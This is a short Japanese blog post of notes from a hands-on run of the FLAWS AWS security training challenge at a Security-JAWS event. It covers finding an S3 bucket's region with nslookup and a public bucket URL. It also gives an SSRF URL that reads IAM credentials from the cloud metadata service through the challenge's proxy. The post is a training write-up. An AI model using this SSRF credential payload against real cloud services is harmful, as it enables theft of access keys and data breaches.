とある診断員とSecurity-JAWS #01 に参加した

概要

とある診断員とSecurity-JAWS #01に参加した。
とてもよい頭の体操になった。

FLAWSをハンズオン形式で実施した。その際のメモ。
ちなみにflawsのネタばれになる。

S3を公開している場合

名前解決することでリージョンがわかる。

C:\Users\shimizu>nslookup flaws.cloud

権限のない回答:
名前:    flaws.cloud
Address:  52.218.232.234

C:\Users\shimizu>nslookup 52.218.232.234

名前:    s3-website-us-west-2.amazonaws.com
Address:  52.218.232.234

S3で公開しているためバケット名はflaws.cloudとなる。つまり以下URLでアクセス可能。
意図せずデータを公開していた場合、すべて漏洩する。
http://flaws.cloud.s3-us-west-2.amazonaws.com/

SSRF(Server Side Request Forgery)攻撃

リバースプロキシ設定が脆弱であれば、内部の情報を取得することが可能になる。
同様の手法でCapital Oneの個人情報が流出している。
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

メニューを閉じる